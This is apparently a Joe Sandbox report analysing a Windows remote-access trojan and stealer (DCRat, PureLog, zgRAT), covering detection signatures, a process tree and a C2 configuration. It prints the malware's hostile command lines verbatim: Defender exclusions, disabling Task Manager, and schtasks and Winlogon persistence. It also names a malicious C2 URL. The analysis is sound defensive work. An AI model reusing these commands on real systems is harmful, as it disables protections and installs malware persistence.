Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XenoSetup(2).exe.bin.exe

Overview

General Information

Sample name:XenoSetup(2).exe.bin.exe
Analysis ID:1590013
MD5:5aa236eabe65a1e444f1eb31fb330eba
SHA1:b6a8d5362991511526ea5a2b86ad70f05e70652c
SHA256:3d79293d371d3393d83f0d6205c35263baa3618a6f3ccba4fcefbee999d4a714
Tags:DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Creates processes via WMI
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • XenoSetup(2).exe.bin.exe (PID: 876 cmdline: "C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe" MD5: 5AA236EABE65A1E444F1EB31FB330EBA)
    • powershell.exe (PID: 6400 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • XenoSetup(1).exe (PID: 1476 cmdline: "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe" MD5: BCF49847A74E554A807294D4F5ADFA62)
      • wscript.exe (PID: 3820 cmdline: "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 2104 cmdline: C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 5396 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • DriverbrokerCrtDhcp.exe (PID: 1864 cmdline: "C:\portBrokerDll/DriverbrokerCrtDhcp.exe" MD5: C9D8BCE0425ED81346B9A43F148D948B)
            • schtasks.exe (PID: 2528 cmdline: schtasks.exe /create /tn "NZdXlPbVdUubKXQN" /sc MINUTE /mo 8 /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 340 cmdline: schtasks.exe /create /tn "NZdXlPbVdUubKXQ" /sc ONLOGON /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 5892 cmdline: schtasks.exe /create /tn "NZdXlPbVdUubKXQN" /sc MINUTE /mo 12 /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • csc.exe (PID: 4896 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 2664 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4177.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCEACDD11852CD4DF0A8C4FA8867592994.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • csc.exe (PID: 1540 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 2276 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES436B.tmp" "c:\Users\user\AppData\Local\Temp\CSCF5A66DC0AE3041F58A3C1CE4B9A61B98.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • csc.exe (PID: 1088 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 876 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES458E.tmp" "c:\Windows\System32\CSC3568A44F8D2D461ABD894E9C160B8C.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • schtasks.exe (PID: 6568 cmdline: schtasks.exe /create /tn "DriverbrokerCrtDhcpD" /sc MINUTE /mo 10 /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 6944 cmdline: schtasks.exe /create /tn "DriverbrokerCrtDhcp" /sc ONLOGON /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 5004 cmdline: schtasks.exe /create /tn "DriverbrokerCrtDhcpD" /sc MINUTE /mo 13 /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 5696 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8dcADkVv20.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 3352 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • PING.EXE (PID: 3064 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
              • DriverbrokerCrtDhcp.exe (PID: 2528 cmdline: "C:\portBrokerDll\DriverbrokerCrtDhcp.exe" MD5: C9D8BCE0425ED81346B9A43F148D948B)
    • Xeno.exe (PID: 6532 cmdline: "C:\Users\user\AppData\Local\Temp\Xeno.exe" MD5: 056586E6A4D9B97C77FD606B2A63F604)
    • NZdXlPbVdUubKXQ.exe (PID: 1476 cmdline: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe MD5: C9D8BCE0425ED81346B9A43F148D948B)
  • XenoSetup(1).exe (PID: 4828 cmdline: "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe" MD5: BCF49847A74E554A807294D4F5ADFA62)
    • wscript.exe (PID: 1776 cmdline: "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 4020 cmdline: C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7084 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • DriverbrokerCrtDhcp.exe (PID: 5692 cmdline: "C:\portBrokerDll/DriverbrokerCrtDhcp.exe" MD5: C9D8BCE0425ED81346B9A43F148D948B)
  • XenoSetup(1).exe (PID: 2012 cmdline: "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe" MD5: BCF49847A74E554A807294D4F5ADFA62)
    • wscript.exe (PID: 2676 cmdline: "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2996 cmdline: C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 4788 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • DriverbrokerCrtDhcp.exe (PID: 5376 cmdline: "C:\portBrokerDll/DriverbrokerCrtDhcp.exe" MD5: C9D8BCE0425ED81346B9A43F148D948B)
  • NZdXlPbVdUubKXQ.exe (PID: 3184 cmdline: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe MD5: C9D8BCE0425ED81346B9A43F148D948B)
  • DriverbrokerCrtDhcp.exe (PID: 4372 cmdline: C:\portBrokerDll\DriverbrokerCrtDhcp.exe MD5: C9D8BCE0425ED81346B9A43F148D948B)
  • DriverbrokerCrtDhcp.exe (PID: 6952 cmdline: C:\portBrokerDll\DriverbrokerCrtDhcp.exe MD5: C9D8BCE0425ED81346B9A43F148D948B)
  • NZdXlPbVdUubKXQ.exe (PID: 1912 cmdline: "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe" MD5: C9D8BCE0425ED81346B9A43F148D948B)
  • cleanup
{"C2 url": "http://804052cm.nyashkoon.ru/imagelineGeoTest", "MUTEX": "DCR_MUTEX-SbjZ9dzDfzVchxMwaR3O", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
SourceRuleDescriptionAuthorStrings
0000000F.00000002.2691486762.000000001BCC0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    0000000F.00000002.2691486762.000000001BCC0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      0000000F.00000002.2633412439.0000000013584000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        0000000F.00000002.2633412439.0000000013BEA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          Process Memory Space: DriverbrokerCrtDhcp.exe PID: 1864JoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    15.2.DriverbrokerCrtDhcp.exe.13c238a0.24.raw.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Click to see the 1 entries

                      System Summary

                      barindex
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 1088, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe, ProcessId: 876, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XenoSetup(1)
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe", ParentImage: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe, ParentProcessId: 876, ParentProcessName: XenoSetup(2).exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', ProcessId: 6400, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe", ParentImage: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe, ParentProcessId: 876, ParentProcessName: XenoSetup(2).exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', ProcessId: 6400, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe", ParentImage: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe, ParentProcessId: 876, ParentProcessName: XenoSetup(2).exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', ProcessId: 6400, ProcessName: powershell.exe
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe", ParentImage: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe, ParentProcessId: 876, ParentProcessName: XenoSetup(2).exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', ProcessId: 6400, ProcessName: powershell.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe, ProcessId: 876, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XenoSetup(1)
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe", EventID: 13, EventType: SetValue, Image: C:\portBrokerDll\DriverbrokerCrtDhcp.exe, ProcessId: 1864, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\portBrokerDll/DriverbrokerCrtDhcp.exe", ParentImage: C:\portBrokerDll\DriverbrokerCrtDhcp.exe, ParentProcessId: 1864, ParentProcessName: DriverbrokerCrtDhcp.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline", ProcessId: 4896, ProcessName: csc.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe", ParentImage: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe, ParentProcessId: 876, ParentProcessName: XenoSetup(2).exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', ProcessId: 6400, ProcessName: powershell.exe
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe" , ParentImage: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe, ParentProcessId: 1476, ParentProcessName: XenoSetup(1).exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe" , ProcessId: 3820, ProcessName: wscript.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\portBrokerDll\DriverbrokerCrtDhcp.exe, ProcessId: 1864, TargetFilename: C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe", ParentImage: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe, ParentProcessId: 876, ParentProcessName: XenoSetup(2).exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', ProcessId: 6400, ProcessName: powershell.exe

                      Data Obfuscation

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\portBrokerDll/DriverbrokerCrtDhcp.exe", ParentImage: C:\portBrokerDll\DriverbrokerCrtDhcp.exe, ParentProcessId: 1864, ParentProcessName: DriverbrokerCrtDhcp.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline", ProcessId: 4896, ProcessName: csc.exe
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: XenoSetup(2).exe.bin.exeAvira: detected
                      Source: http://804052cm.nyashkoon.ru/imagelineGeoTest.phpAvira URL Cloud: Label: malware
                      Source: http://804052cm.nyashkoon.ruAvira URL Cloud: Label: malware
                      Source: http://804052cm.nyashkoon.ru/Avira URL Cloud: Label: malware
                      Source: C:\Users\user\Desktop\GyShWgyC.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                      Source: C:\Users\user\Desktop\IlCyhHua.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                      Source: C:\Users\user\AppData\Local\Temp\8dcADkVv20.batAvira: detection malicious, Label: BAT/Delbat.C
                      Source: C:\Users\user\Desktop\BFVQSOun.logAvira: detection malicious, Label: TR/Agent.jbwuj
                      Source: C:\Users\user\Desktop\ESyrPCdJ.logAvira: detection malicious, Label: TR/Agent.jbwuj
                      Source: C:\Users\user\Desktop\ItmQLqVf.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                      Source: C:\Users\user\Desktop\Aqnqislq.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                      Source: C:\Users\user\Desktop\ARRIhAyp.logAvira: detection malicious, Label: HEUR/AGEN.1300079
